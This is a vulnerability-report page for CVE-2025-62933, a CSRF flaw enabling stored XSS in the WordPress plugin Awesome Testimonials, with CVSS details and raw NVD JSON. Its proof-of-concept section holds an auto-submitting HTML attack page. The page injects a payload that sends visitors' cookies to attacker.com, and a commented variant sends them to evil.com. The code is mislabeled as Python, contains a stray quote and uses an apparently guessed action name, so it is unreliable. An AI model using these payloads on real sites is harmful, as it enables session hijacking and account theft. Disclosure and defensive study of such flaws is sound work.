Security Vulnerability Report
中文
CVE-2025-62933 CVSS 7.1 HIGH

CVE-2025-62933

Published: 2025-10-27 02:15:53
Last Modified: 2026-04-27 17:16:35

Description

Cross-Site Request Forgery (CSRF) vulnerability in Prakash Awesome Testimonials awesome-testimonials allows Stored XSS.This issue affects Awesome Testimonials: from n/a through <= 2.2.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Awesome Testimonials <= 2.2.1
Awesome Testimonials 从任意版本到 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62933 --> <!-- Stored XSS via Testimonial Submission --> <!DOCTYPE html> <html> <head> <title>CSRF Attack - Awesome Testimonials</title> </head> <body> <h1>Malicious CSRF Page</h1> <p>This page will automatically submit a forged request to add a malicious testimonial.</p> <form id="attackForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <!-- WordPress AJAX action --> <input type="hidden" name="action" value="awesome_testimonials_save"> <!-- Missing CSRF token - this is the vulnerability --> <input type="hidden" name="testimonial_name" value="Attacker"> <input type="hidden" name="testimonial_content" value="<img src=x onerror='fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)\";'>Nice service!"> <input type="hidden" name="testimonial_rating" value="5"> </form> <script> // Auto-submit the form when page loads document.getElementById('attackForm').submit(); console.log('Malicious request sent'); </script> </body> </html> <!-- Alternative: Using img onerror for XSS --> <!-- <img src=x onerror="fetch('https://evil.com/log?c='+btoa(document.cookie))"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62933", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:53.123", "lastModified": "2026-04-27T17:16:35.433", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Prakash Awesome Testimonials awesome-testimonials allows Stored XSS.This issue affects Awesome Testimonials: from n/a through <= 2.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/awesome-testimonials/vulnerability/wordpress-awesome-testimonials-plugin-2-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}